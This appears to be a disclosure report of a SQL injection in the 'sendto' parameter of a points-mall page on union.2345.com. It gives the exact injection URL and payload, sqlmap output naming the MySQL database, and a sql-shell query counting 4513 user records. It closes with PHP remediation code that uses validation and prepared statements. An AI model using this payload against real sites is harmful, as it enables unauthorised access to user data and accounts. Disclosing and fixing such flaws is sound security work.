SQL injection vulnerability in a 2345 sub-site

Site: 2345 Union (2345大联盟), union.2345.com

Injection point: https://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271

The parameter sendto is vulnerable to a MySQL string-type (quoted) injection.
sqlmap output:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sendto
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU
---
[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:17:55] [INFO] testing MySQL
[13:17:55] [INFO] confirming MySQL
[13:17:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[13:17:55] [INFO] fetching current database
[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:17:55] [INFO] retrieved: 
[13:17:55] [WARNING] reflective value(s) found and filtering out
union2345
current database: 'union2345'

This affects the union's registered users and touches on the security of user funds.

web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from all_user
[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'
[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:25:38] [INFO] retrieved: 
[13:25:38] [WARNING] reflective value(s) found and filtering out
4513
select count(*) from all_user: '4513'
sql-shell>
Solution:
Filter the input.
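As an added example (not code from 2345's site), a hardened PHP handler for the sendto parameter: the value is validated as an integer and then bound through a PDO prepared statement instead of being concatenated into the query, so a value like 1' and '1'='1 can never alter the SQL. The table and column names, the DSN and the credentials are assumptions.

```php
<?php
// Added example, not 2345's code. Table `mall_product`, its columns, the DSN
// and the credentials below are assumptions for illustration only.

function findProductsBySendto(PDO $db, string $rawSendto): array
{
    // 1. Validate. The legitimate value in the report is a small integer
    //    ("sendto=1"); anything else, including "1' and '1'='1", is rejected
    //    before it gets anywhere near SQL.
    if (!preg_match('/^\d{1,6}$/', $rawSendto)) {
        throw new InvalidArgumentException('sendto must be a positive integer');
    }
    $sendto = (int) $rawSendto;

    // 2. Parameterize. The value is bound, never concatenated, so quote
    //    characters in the input cannot change the structure of the query.
    $stmt = $db->prepare(
        'SELECT id, name, price FROM mall_product WHERE sendto = :sendto'
    );
    $stmt->bindValue(':sendto', $sendto, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (assumed DSN and credentials; the database name comes from the report).
$db = new PDO(
    'mysql:host=localhost;dbname=union2345;charset=utf8mb4',
    'app_user',
    'app_password',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

try {
    $rows = findProductsBySendto($db, $_GET['sendto'] ?? '');
    header('Content-Type: application/json');
    echo json_encode($rows);
} catch (InvalidArgumentException $e) {
    // Invalid input is a client error; do not echo the raw value back.
    http_response_code(400);
    echo 'bad request';
}
```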